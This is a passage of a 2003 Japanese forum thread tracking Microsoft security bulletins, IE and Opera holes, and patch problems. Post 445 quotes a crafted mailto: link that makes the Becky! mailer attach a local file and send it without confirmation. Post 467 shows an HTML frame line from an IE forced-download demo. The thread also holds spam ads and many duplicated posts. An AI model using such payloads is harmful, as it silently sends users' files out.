http://www.microsoft.com/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=ja
・NEC PC-9800 シリーズ
(WU)
http://www.microsoft.com/downloads/details.aspx?FamilyID=fbcf9847-d3d6-4493-8dcf-9ba29263c49f&DisplayLang=ja
(WU)このマークの付いている修正プログラムは Windows Update から
インストールすることもできます。
393 :名無しさん@お腹いっぱい。:03/03/18 16:55
age
394 :MS03-007:03/03/19 17:23
http://www.microsoft.com/japan/technet/security/bulletin/ms03-007.asp
今回の更新内容
このセキュリティ情報ページを更新し、影響を受ける Windows コンポーネント
を明確にしました。また、「よく寄せられる質問」 に IIS 5.0 に関する質問を
追加し、「修正プログラムに関する追加情報」 の 「警告」 欄に新しい情報を
追加しました。
今回の更新内容
このセキュリティ情報ページを更新し、影響を受ける Windows コンポーネント
を明確にしました。また、「よく寄せられる質問」 に IIS 5.0 に関する質問を
追加し、「修正プログラムに関する追加情報」 の 「警告」 欄に新しい情報を
追加しました。
395 :名無しさん@お腹いっぱい。:03/03/19 17:46
396 :名無しさん@お腹いっぱい。:03/03/19 22:44
>>388の修正済みバージョン、Opera7.03しかなかったが、
Opera6.06も、いまのところ英語版だけだが、リリースされた。
http://www.opera.com/windows/changelogs/606/
ftp://ftp.opera.com/pub/opera/win/606/en/(Opera6.06 EN)
ノルウェーOpera Software,セキュリティ・ ホールを修正した「Opera 7.03」を公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030314/1/
Opera6.06も、いまのところ英語版だけだが、リリースされた。
http://www.opera.com/windows/changelogs/606/
ftp://ftp.opera.com/pub/opera/win/606/en/(Opera6.06 EN)
ノルウェーOpera Software,セキュリティ・ ホールを修正した「Opera 7.03」を公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030314/1/
397 :名無しさん@お腹いっぱい。:03/03/20 10:47
Windows全バージョンに「緊急」の脆弱性
http://www.zdnet.co.jp/news/0303/20/nebt_18.html
http://www.zdnet.co.jp/news/0303/20/nebt_18.html
「MS03-009: ISA Server DNS アタック検出フィルタの問題により、サービス拒否が起こる (331065)」
http://www.microsoft.com/japan/technet/security/bulletin/ms03-009ov.asp
対象となる製品:Microsoft ISA Server 2000
http://www.microsoft.com/japan/technet/security/bulletin/ms03-009ov.asp
対象となる製品:Microsoft ISA Server 2000
>>397
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-008.asp?tag=nl
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-008.asp?tag=nl
400 :名無しさん@お腹いっぱい。:03/03/20 12:33
MS03-008 Windows スクリプト エンジンの問題により、コードが実行される(814078)
日本語ページ
http://www.microsoft.com/japan/technet/security/bulletin/ms03-008ov.asp
Windowsにまたもや「緊急」のホール,すべてのユーザーはWindowsUpdateの実施を
ISA Server 2000には「警告」のセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030320/1/
日本語ページ
http://www.microsoft.com/japan/technet/security/bulletin/ms03-008ov.asp
Windowsにまたもや「緊急」のホール,すべてのユーザーはWindowsUpdateの実施を
ISA Server 2000には「警告」のセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030320/1/
401 :名無しさん@お腹いっぱい。:03/03/20 17:32
>>388>>396
「Opera パッケージ版」はセキュリティ・ホールがあるOpera 7.02,ユーザーはバージョン・アップを
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030320/2/
「Opera パッケージ版」はセキュリティ・ホールがあるOpera 7.02,ユーザーはバージョン・アップを
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030320/2/
402 :名無しさん@お腹いっぱい。:03/03/22 11:59
http://www.microsoft.com/japan/ie/downloads/recommended/ie55sp2/default.asp
現在Internet Explorer 5.5SP2/6のダウンロードは停止中、マイクロソフトが確認を行っています。
現在Internet Explorer 5.5SP2/6のダウンロードは停止中、マイクロソフトが確認を行っています。
403 :名無しさん@お腹いっぱい。:03/03/24 12:13
age
404 :MS03-007:03/03/26 08:08
「IISを動かしていなくても危険」――Windows 2000の深刻なセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030325/1/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030325/1/
相次ぐ「緊急」にマヒするな,IISのホール は“過去最大級”の危険度
パッチ公開前に攻撃コードが存在,既に攻撃されている恐れあり
今週のSecurity Check [Windows編] (第91回,2003年3月26日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030325/1/
パッチ公開前に攻撃コードが存在,既に攻撃されている恐れあり
今週のSecurity Check [Windows編] (第91回,2003年3月26日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030325/1/
406 :MS03-010:03/03/27 10:48
「MS03-010: RPC エンドポイント マッパーの問題により、サービス拒否の攻撃が実行される (331953)」
http://www.microsoft.com/japan/technet/security/bulletin/ms03-010ov.asp
○概要
この問題は、下記製品のリモート プロシージャ コール (RPC: Remote
Procedure Call) のエンドポイント マッパーに問題があり、サービス拒否の
攻撃を受ける可能性があります。その結果、悪意のあるユーザーにお客様の
コンピューター上のサービスを停止させられる可能性があります。
○対象となる製品
・Microsoft Windows NT 4.0
・Microsoft Windows 2000
・Microsoft Windows XP
http://www.microsoft.com/japan/technet/security/bulletin/ms03-010ov.asp
○概要
この問題は、下記製品のリモート プロシージャ コール (RPC: Remote
Procedure Call) のエンドポイント マッパーに問題があり、サービス拒否の
攻撃を受ける可能性があります。その結果、悪意のあるユーザーにお客様の
コンピューター上のサービスを停止させられる可能性があります。
○対象となる製品
・Microsoft Windows NT 4.0
・Microsoft Windows 2000
・Microsoft Windows XP
407 :名無しさん@お腹いっぱい。:03/03/27 14:55
>>406
Windows NT/2000/XPの機能を攻撃者が停止できるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030327/1/
Windows NT/2000/XPの機能を攻撃者が停止できるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030327/1/
408 :MS03-007:03/03/27 17:24
当初の報告よりもずっと深刻だったWindows 2000のセキュリティホール
http://www.zdnet.co.jp/enterprise/0303/26/epn01.html
3月18日に公表されたWindows 2000のセキュリティホールが与える影響は、当初考
えられて いたよりもずっと広範囲に及ぶという。速やかなパッチの適用が必要だ。
http://www.zdnet.co.jp/enterprise/0303/26/epn01.html
3月18日に公表されたWindows 2000のセキュリティホールが与える影響は、当初考
えられて いたよりもずっと広範囲に及ぶという。速やかなパッチの適用が必要だ。
409 :名無しさん@お腹いっぱい。:03/04/07 19:24
Opera 7とNetscape 7.02 Webブラウザにサービス拒否攻撃を受ける弱点
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030407/1/
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030407/1/
410 :MS03-011:03/04/10 11:40
Microsoft VMにまたもや「緊急」のセキュリティ・ホール,Windowsユーザーはすぐに対策を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030410/1/
MS03-011 に関する情報
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-011ov.asp
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030410/1/
MS03-011 に関する情報
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-011ov.asp
411 :名無しさん@お腹いっぱい。:03/04/10 13:06
>>410
これ5MBもあるし、鯖が混んでるのか、なかなか落ちてこないね。
これ5MBもあるし、鯖が混んでるのか、なかなか落ちてこないね。
412 :名無しさん@お腹いっぱい。:03/04/16 10:07
米マイクロソフト,今後1年間のセキュリティの取り組みを明らかに
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20030416/3/
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20030416/3/
413 :名無しさん@お腹いっぱい。:03/04/16 19:14
Windows Updateから修正パッチを適用できない問題が発覚,NTユーザーは注意
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030416/1/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030416/1/
414 :MS03-013:03/04/17 08:18
「MS03-013: Windows カーネル メッセージ処理のバッファ オーバーランにより、権限が昇格する (811493)」
http://www.microsoft.com/japan/technet/security/bulletin/ms03-013ov.asp
影響を受けるソフトウェア
・Microsoft Windows NT 4.0
・Microsoft Windows NT 4.0 Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP
http://www.microsoft.com/japan/technet/security/bulletin/ms03-013ov.asp
影響を受けるソフトウェア
・Microsoft Windows NT 4.0
・Microsoft Windows NT 4.0 Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP
415 :名無しさん@お腹いっぱい。:03/04/17 10:13
Windowsに「重要」のセキュリティ・ホール,一般ユーザーに管理者権限を奪われる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030417/1/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030417/1/
(^^)
417 :名無しさん@お腹いっぱい。:03/04/17 12:38
age
∧_∧
( ^^ )< ぬるぽ(^^)
( ^^ )< ぬるぽ(^^)
419 :名無しさん@お腹いっぱい。:03/04/20 21:17
sage
420 :名無しさん@お腹いっぱい。:03/04/21 18:10
421 :名無しさん@お腹いっぱい。:03/04/21 19:20
422 :名無しさん@お腹いっぱい。:03/04/21 21:28
>>421
俺の場合はIEだけ遅くなった。
パッチID(811493)調べるためにMS03-013のページ開こうとして20分かかった。(通常は10数秒)
その間CPUは100%振り切り(時々CPUステータスのゲットすら出来ない)
コーポレート契約のマカ4.5.1が入ってる。
俺の場合はIEだけ遅くなった。
パッチID(811493)調べるためにMS03-013のページ開こうとして20分かかった。(通常は10数秒)
その間CPUは100%振り切り(時々CPUステータスのゲットすら出来ない)
コーポレート契約のマカ4.5.1が入ってる。
423 :cheshire-cat ◆CATBCJABLA :03/04/21 21:55
>攻撃者が攻撃を行うには、直接コンソールで、またはターミナル セッションを介し、標的となるコンピュータに対話的にログオンできることが必要条件となります。
http://www.microsoft.com/japan/technet/security/bulletin/MS03-013.asp
MS03-013って、当面の間は導入する必要性は薄いような予感。
http://www.microsoft.com/japan/technet/security/bulletin/MS03-013.asp
MS03-013って、当面の間は導入する必要性は薄いような予感。
424 :名無しさん@お腹いっぱい。:03/04/23 01:18
425 :名無しさん@お腹いっぱい。:03/04/23 11:13
>>410MS03-011関連
Microsoft VMのサポートは2003年末まで,求められるアンインストール機能
相次ぐWindows Updateのトラブル,トラブル情報の周知を
今週のSecurity Check [Windows編] (第93回,2003年4月23日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030422/1/
・Microsoft VMに「緊急」のセキュリティ・ホール
・Microsoft VMのサポートは2003年末まで
・トラブルが続出するWindows Update
・Windows カーネルにホール,パッチ適用でパフォーマンスの低下も
・ISA Serverにセキュリティ・ホール
・Indexing Server for Windows NT 4.0用パッチが公開
・TechNet Online セキュリティでは“月例”ドキュメント
Microsoft VMのサポートは2003年末まで,求められるアンインストール機能
相次ぐWindows Updateのトラブル,トラブル情報の周知を
今週のSecurity Check [Windows編] (第93回,2003年4月23日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030422/1/
・Microsoft VMに「緊急」のセキュリティ・ホール
・Microsoft VMのサポートは2003年末まで
・トラブルが続出するWindows Update
・Windows カーネルにホール,パッチ適用でパフォーマンスの低下も
・ISA Serverにセキュリティ・ホール
・Indexing Server for Windows NT 4.0用パッチが公開
・TechNet Online セキュリティでは“月例”ドキュメント
426 :名無しさん@お腹いっぱい。:03/04/24 10:31
IEとOutlook Expressに「緊急」の脆弱性
http://www.zdnet.co.jp/news/0304/24/nebt_06.html
http://www.zdnet.co.jp/news/0304/24/nebt_06.html
427 :名無しさん@お腹いっぱい。:03/04/24 10:54
>>426
WindowsUpdateにあがっている。
MS03-015
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-015ov.asp
MS03-014
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-014ov.asp
WindowsUpdateにあがっている。
MS03-015
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-015ov.asp
MS03-014
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-014ov.asp
428 :名無しさん@お腹いっぱい。:03/04/24 11:45
ちょっと前にMS03-014のパッチに問題があって異常終了するって有ったけど
それはもう改善されてんの?
もうMS03-014あてても大丈夫?
それはもう改善されてんの?
もうMS03-014あてても大丈夫?
429 :名無しさん@お腹いっぱい。:03/04/24 11:49
430 :名無しさん@お腹いっぱい。:03/04/24 11:50
間違えた!
MS03-014じゃなくてMS03-004だった。
MS03-004 適用後 Outlook Express が正しく動作しない
http://support.microsoft.com/default.aspx?scid=kb;ja;814803
MS03-014じゃなくてMS03-004だった。
MS03-004 適用後 Outlook Express が正しく動作しない
http://support.microsoft.com/default.aspx?scid=kb;ja;814803
431 :名無しさん@お腹いっぱい。:03/04/24 11:54
オペレーターとチャットで相談って使えんの?
今、初めて知ったんだけど。
今、初めて知ったんだけど。
432 :名無しさん@お腹いっぱい。:03/04/24 11:55
433 :名無しさん@お腹いっぱい。:03/04/24 11:59
434 :名無しさん@お腹いっぱい。:03/04/24 12:13
ここのところMSはパッチのリリースの速さの方に重点を置いている
ようなので、あわててパッチを当てない方が賢明。
しばらくして不具合報告がないようなら当てる、
自分に必要なパッチかよく検討してみてから当てる(>>423)、が吉。
もっとも、全くWindowsUpdateもしないで素のIE5.01とか使ってるのは論外。
ようなので、あわててパッチを当てない方が賢明。
しばらくして不具合報告がないようなら当てる、
自分に必要なパッチかよく検討してみてから当てる(>>423)、が吉。
もっとも、全くWindowsUpdateもしないで素のIE5.01とか使ってるのは論外。
435 :MS03-014,MS03-015:03/04/24 12:54
>>426-427関連
IEとOutlook Expressに「緊急」のセキュリティ・ホール,Windows Updateの実施を
任意のコードを実行させられる恐れあり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030424/1/
IEとOutlook Expressに「緊急」のセキュリティ・ホール,Windows Updateの実施を
任意のコードを実行させられる恐れあり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030424/1/
436 :名無しさん@お腹いっぱい。:03/04/24 17:24
age
437 :MS03-007:03/04/24 17:46
http://www.microsoft.com/japan/technet/security/bulletin/ms03-007.asp
今回の更新内容
このセキュリティ情報ページを更新し、脆弱性の調査をさらに続けた結果
Windows NT 4.0 についても同じ脆弱性が存在したため、Windows NT4.0
および Windows NT4.0 Terminal Server Edition 用の修正プログラム
の情報を追加しました。
Windows 2000と同じセキュリティ・ホールがWindows NTに,ただし深刻度は「重要」
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030424/2/
今回の更新内容
このセキュリティ情報ページを更新し、脆弱性の調査をさらに続けた結果
Windows NT 4.0 についても同じ脆弱性が存在したため、Windows NT4.0
および Windows NT4.0 Terminal Server Edition 用の修正プログラム
の情報を追加しました。
Windows 2000と同じセキュリティ・ホールがWindows NTに,ただし深刻度は「重要」
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030424/2/
438 :人柱は!!!!!!!!!:03/04/24 21:15
439 :名無しさん@お腹いっぱい。:03/04/24 21:27
>>438
自分でやれ。
自分でやれ。
440 :cheshire-cat ◆CATBCJABLA :03/04/24 22:54
MS03-013不具合 - パフォーマンス低下(XP SP1)
http://www.microsoft.com/japan/technet/security/bulletin/fq03-013.asp
http://www.microsoft.com/japan/technet/security/bulletin/fq03-013.asp
441 :名無しさん@お腹いっぱい。:03/04/25 10:56
age
442 :名無しさん@お腹いっぱい。:03/04/26 17:42
Sunの最新JavaランタイムがIEで使えないことが判明したんで
SunのをウンインスコしてMS-VMを最新にしたところ
セキュ確認済みの未認可AxtiveXが動かない
そこでサンドボックス限定で許可したらOK
とゆーことは
SunのプラグインはOSのセキュ設定レベル見てない
サイト鯖自体のセキュ区分で許可の有無はできるが
こういうあいまいな部分で素通しなのか
ネスケみてえだ
SunのをウンインスコしてMS-VMを最新にしたところ
セキュ確認済みの未認可AxtiveXが動かない
そこでサンドボックス限定で許可したらOK
とゆーことは
SunのプラグインはOSのセキュ設定レベル見てない
サイト鯖自体のセキュ区分で許可の有無はできるが
こういうあいまいな部分で素通しなのか
ネスケみてえだ
443 :名無しさん@お腹いっぱい。:03/05/02 13:39
「メール本文を開くだけで感染するウイルスに注意」――IPA
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030501/1/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030501/1/
444 :名無しさん@お腹いっぱい。:03/05/02 13:47
結局shurikenpro買ったよ
445 :名無しさん@お腹いっぱい。:03/05/03 17:39
Becky! なら安心と思ったら大間違い。セキュリティホールが見つかりました。
http://slashdot.jp/security/03/05/02/2151212.shtml?topic=16
65 名前:名無しさん@お腹いっぱい。 投稿日:03/05/03 17:26 ID:nWmKJb8r
おまいら、大変です!!
mailto:[email protected]?X-Becky-Attachment=C:/Program%20Files/Katjusha/kakikomi.txt
&X-Becky-Action=send&subject=End_of_the_life&body=moudamepo
こんなリンクが張られたら一巻の終わりじゃないですか?
すぐにかちゅーしゃのインスト先を変えるか、mailto:設定を変えましょう!!
67 名前:65 投稿日:03/05/03 17:29 ID:nWmKJb8r
補足。
>>45みたいのだと送信前に確認ダイアログが開くけど、
subjectとbodyを付けると確認なしでメールが送られてしまいます。
http://slashdot.jp/security/03/05/02/2151212.shtml?topic=16
65 名前:名無しさん@お腹いっぱい。 投稿日:03/05/03 17:26 ID:nWmKJb8r
おまいら、大変です!!
mailto:[email protected]?X-Becky-Attachment=C:/Program%20Files/Katjusha/kakikomi.txt
&X-Becky-Action=send&subject=End_of_the_life&body=moudamepo
こんなリンクが張られたら一巻の終わりじゃないですか?
すぐにかちゅーしゃのインスト先を変えるか、mailto:設定を変えましょう!!
67 名前:65 投稿日:03/05/03 17:29 ID:nWmKJb8r
補足。
>>45みたいのだと送信前に確認ダイアログが開くけど、
subjectとbodyを付けると確認なしでメールが送られてしまいます。
446 :名無しさん@お腹いっぱい。:03/05/03 17:43
だから最新パッチあててるOEの方が安全だってば。
447 :名無しさん@お腹いっぱい。:03/05/03 17:52
448 :名無しさん@お腹いっぱい。:03/05/07 14:07
>>440
ウィルスバスターがダメなんだと
ウィルスバスターがダメなんだと
449 :名無しさん@お腹いっぱい。:03/05/07 21:49
>>448
ソースは?
ソースは?
450 :名無しさん@お腹いっぱい。:03/05/12 17:06
IEとスクリプトの“危険な関係”(上)
スクリプトの脅威
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20030502/2/
IEとスクリプトの“危険な関係”(中)
クロスサイトが危ない
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20030502/3/
IEとスクリプトの“危険な関係”(下)
IEがActiveXを利用する仕組み
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20030502/4/
スクリプトの脅威
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20030502/2/
IEとスクリプトの“危険な関係”(中)
クロスサイトが危ない
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20030502/3/
IEとスクリプトの“危険な関係”(下)
IEがActiveXを利用する仕組み
http://itpro.nikkeibp.co.jp/members/NBY/techsquare/20030502/4/
451 :動画直リン:03/05/12 17:10
452 :名無しさん@お腹いっぱい。:03/05/12 17:12
Opera for Windowsに新しいセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030502/1/
Opera 7.10 for Windowsにオーバーフローによる脆弱性の可能性
http://jp.opera.com/cgi-bin/supsearch2.cgi?options=index&name=j101
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030502/1/
Opera 7.10 for Windowsにオーバーフローによる脆弱性の可能性
http://jp.opera.com/cgi-bin/supsearch2.cgi?options=index&name=j101
453 :名無しさん@お腹いっぱい。:03/05/15 23:43
Internet Explorerがfile:// リクエストの際にゾーンを無視する
http://www.symantec.com/region/jp/sarcj/security/content/7539.html
http://www.symantec.com/region/jp/sarcj/security/content/7539.html
454 :名無しさん@お腹いっぱい。:03/05/16 00:56
455 :名無しさん@お腹いっぱい。:03/05/19 17:53
MSサポートを装うウイルスに注意
http://www.zdnet.co.jp/news/0305/19/njbt_03.html
IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030517/1/
米で“自己消滅するDVD”導入へ
http://www.zdnet.co.jp/news/0305/19/xert_disney.html
http://www.zdnet.co.jp/news/0305/19/njbt_03.html
IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030517/1/
米で“自己消滅するDVD”導入へ
http://www.zdnet.co.jp/news/0305/19/xert_disney.html
456 :名無しさん@お腹いっぱい。:03/05/19 18:43
457 :名無しさん@お腹いっぱい。:03/05/19 20:51
Hotfix出てないんかい
458 :cheshire-cat ◆CATBCJABLA :03/05/19 20:54
459 :名無しさん@お腹いっぱい。:03/05/19 22:05
>IEに危険なセキュリティ・ホール,スクリプトを無効にしても攻撃を受ける
ここにも記事載ってる
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/05.html#20030516_ie
マック版IEも同じ穴があるみたいだね。
ここサンプルページ(要注意)
http://www.malware.com/forceframe.html
ここにも記事載ってる
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/05.html#20030516_ie
マック版IEも同じ穴があるみたいだね。
ここサンプルページ(要注意)
http://www.malware.com/forceframe.html
460 :yuis:03/05/19 22:06
27才人妻です。ダンナがかまってくれないので、いつも一人でオナってます。
でも、けっこうオカズに困るんですよね。そんな時見つけたのがYUIS!!
安いし、安心して買えるしなかなかいいですよ!いつもバイブ物買ってます!
http://www.dvd-yuis.com/
でも、けっこうオカズに困るんですよね。そんな時見つけたのがYUIS!!
安いし、安心して買えるしなかなかいいですよ!いつもバイブ物買ってます!
http://www.dvd-yuis.com/
461 :名無しさん@お腹いっぱい。:03/05/19 22:16
ファイルのダウソ禁止してダウソはツール使うしかなさげだな。
462 :名無しさん@お腹いっぱい。:03/05/19 22:32
Opera使いの俺はだいじょうび
463 :cheshire-cat ◆CATBCJABLA :03/05/19 22:41
報告。
デモページ踏んでみたんすけど。
20回目位にてNorton Personal Firewallのダイアログが出てきますて。
http://members.tripod.co.jp/nekohako/norton.jpg
「許可しないよん!」だと、無限別窓は消え、インスコまで至らないようでした。
ちょい疲れてるんで、もう寝まする。誰か追試してくだされ。
デモページ踏んでみたんすけど。
20回目位にてNorton Personal Firewallのダイアログが出てきますて。
http://members.tripod.co.jp/nekohako/norton.jpg
「許可しないよん!」だと、無限別窓は消え、インスコまで至らないようでした。
ちょい疲れてるんで、もう寝まする。誰か追試してくだされ。
464 :cheshire-cat ◆CATBCJABLA :03/05/19 23:02
プロバとどゆ回線契約してるかとか、パソの性能もアリっすかね。
下痢後の酒はちょい体にこたえて。
ちょい吐いてきまする。
下痢後の酒はちょい体にこたえて。
ちょい吐いてきまする。
465 :名無しさん@お腹いっぱい。:03/05/19 23:13
466 :ぼるじょあ ◆yBEncckFOU :03/05/19 23:31
467 :名無しさん@お腹いっぱい。:03/05/19 23:50
>>459 のデモ
「現在のセキュリティではDLできません」のダイアログ永遠に開きまくり
IE落としたら「ダウンロードを中止していいですか?」だってw
<FRAME SRC="C:\winnt\****.exe"></FRAME> こんなの並べてるだけでかいな
これマジでやばいよ
「現在のセキュリティではDLできません」のダイアログ永遠に開きまくり
IE落としたら「ダウンロードを中止していいですか?」だってw
<FRAME SRC="C:\winnt\****.exe"></FRAME> こんなの並べてるだけでかいな
これマジでやばいよ
468 :名無しさん@お腹いっぱい。:03/05/21 02:39
Irvineのクリックキャッチを有効にしとくと
1個ずつしかダイアログが出なくなるから大丈夫げ
1個ずつしかダイアログが出なくなるから大丈夫げ
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
470 :(≡゜♀゜≡)):03/05/22 02:38
471 :名無しさん@お腹いっぱい。:03/05/24 11:45
472 :名無しさん@お腹いっぱい。:03/05/28 12:06
またもやパッチに不具合,すべてのパッチをアンインストール可能に
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030526/1/
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030526/1/
473 :名無しさん@お腹いっぱい。:03/05/28 13:34
ここのところパフォーマンスダウンの問題で、いまだFIXされない奴
溜まってるのに。。
溜まってるのに。。
474 :m:03/05/28 16:06
◎ちょっと見て見て!!◎
http://yahooo.s2.x-beat.com/linkvp/linkvp.html
http://yahooo.s2.x-beat.com/linkvp/linkvp.html
475 :名無しさん@お腹いっぱい。:03/05/28 16:45
そろそろ新OS出すために
バグをちらほらと小出しにしてる感じだな
バグをちらほらと小出しにしてる感じだな
476 :名無しさん@お腹いっぱい。:03/05/29 00:11
age
477 :名無しさん@お腹いっぱい。:03/05/29 10:21
最善の対策:MSOE使うな。
--------------------------終了----------------------------
--------------------------終了----------------------------
478 :名無しさん@お腹いっぱい。:03/05/29 12:16
>>477
では、お勧めのメーラは?
では、お勧めのメーラは?
479 :名無しさん@お腹いっぱい。:03/05/29 13:27
>>478
メモ帳以外にあるか?メモ帳以上にいいメーラーがあったら知りたいもんだ。
メモ帳以外にあるか?メモ帳以上にいいメーラーがあったら知りたいもんだ。
480 :名無しさん@お腹いっぱい。:03/05/29 19:20
厨な質問なんですが、ドーナツPしか使ってないんだけどIEのパッチ当ててないと
まずいんですか?
まずいんですか?
481 :名無しさん@お腹いっぱい。:03/05/29 20:07
>>480
DonutPはIEコンポーネントブラウザです
DonutPはIEコンポーネントブラウザです
482 :名無しさん@お腹いっぱい。:03/05/29 20:12
483 :名無しさん@お腹いっぱい。:03/06/02 21:31
484 :名無しさん@お腹いっぱい。:03/06/02 21:34
MS03-019 今回の更新内容
攻撃者がコード実行を行える可能性があるため、深刻度を重要に
変更し本セキュリティ情報を変更しました。
修正プログラムを適用済みのお客様は、再適用の必要はありません。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-019.asp
Windows NT/2000のセキュリティ・ホールの深刻度が,より深刻な「重要」に変更
リモートから任意のコードを実行できることが明らかに
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030602/1/
攻撃者がコード実行を行える可能性があるため、深刻度を重要に
変更し本セキュリティ情報を変更しました。
修正プログラムを適用済みのお客様は、再適用の必要はありません。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-019.asp
Windows NT/2000のセキュリティ・ホールの深刻度が,より深刻な「重要」に変更
リモートから任意のコードを実行できることが明らかに
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030602/1/
485 :名無しさん@お腹いっぱい。:03/06/03 09:28
486 :名無しさん@お腹いっぱい。:03/06/03 09:38
487 :名無しさん@お腹いっぱい。:03/06/03 10:35
>>485
「交通事故を起こすので車に乗るのをやめましょう。」って感じの記事だな。
完全にウィルスメールを無くすには以下の仕様のメールソフトになると思う。
・プレーンテキストのみ
・ファイル添付不可
・ハイパーリンク不可
「交通事故を起こすので車に乗るのをやめましょう。」って感じの記事だな。
完全にウィルスメールを無くすには以下の仕様のメールソフトになると思う。
・プレーンテキストのみ
・ファイル添付不可
・ハイパーリンク不可
488 :名無しさん@お腹いっぱい。:03/06/03 11:59
489 :名無しさん@お腹いっぱい。:03/06/03 13:18
490 :名無しさん@お腹いっぱい。:03/06/03 16:17
EdMAXはメッセージを来たままの状態で保存しないから、糞。
491 :名無しさん@お腹いっぱい。:03/06/04 10:19
Microsoft,「IE 6 SP1が独立した最後のWebブラウザ」と語る
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030603/1/
マイクロソフト、IEスタンドアローン版廃止へ
http://japan.cnet.com/news/media/story/0,2000047715,20054861,00.htm
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030603/1/
マイクロソフト、IEスタンドアローン版廃止へ
http://japan.cnet.com/news/media/story/0,2000047715,20054861,00.htm
492 :名無しさん@お腹いっぱい。:03/06/04 10:38
先生方よろしくお願いします。
メールソフトは outlook expressを使用していますが
受信メール、送信メールが全て無くなっています。
何日か前にブラクラ踏んでしまい、その後受信メールだけが全て
無くなっており、何日か過ぎました。
そして今日その間に届いていた受信メール+送信メールが無くなって
いました。
原因は先日踏んだブラクラなのでしょうか?
そしてほっておくとまたこのような事がおきるのでしょうか?
良きアドバイスお願いします。
メールソフトは outlook expressを使用していますが
受信メール、送信メールが全て無くなっています。
何日か前にブラクラ踏んでしまい、その後受信メールだけが全て
無くなっており、何日か過ぎました。
そして今日その間に届いていた受信メール+送信メールが無くなって
いました。
原因は先日踏んだブラクラなのでしょうか?
そしてほっておくとまたこのような事がおきるのでしょうか?
良きアドバイスお願いします。
494 :名無しさん@お腹いっぱい。:03/06/04 10:45
495 :名無しさん@お腹いっぱい。:03/06/04 10:53
>>492
".dbx"でドライブ内を検索してみれ。
メールの保存先が変わっただけなら残っているかもしれない。
ブラクラ踏んで泣く前に、ブラクラチェッカー
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?
".dbx"でドライブ内を検索してみれ。
メールの保存先が変わっただけなら残っているかもしれない。
ブラクラ踏んで泣く前に、ブラクラチェッカー
http://www.jah.ne.jp/~fild/cgi-bin/LBCC/lbcc.cgi?
496 :名無しさん@お腹いっぱい。:03/06/04 11:38
497 :MS03-020:03/06/05 09:24
MS03-020: Internet Explorer 用の累積的な修正プログラム (818529)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-020ov.asp
●概要
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
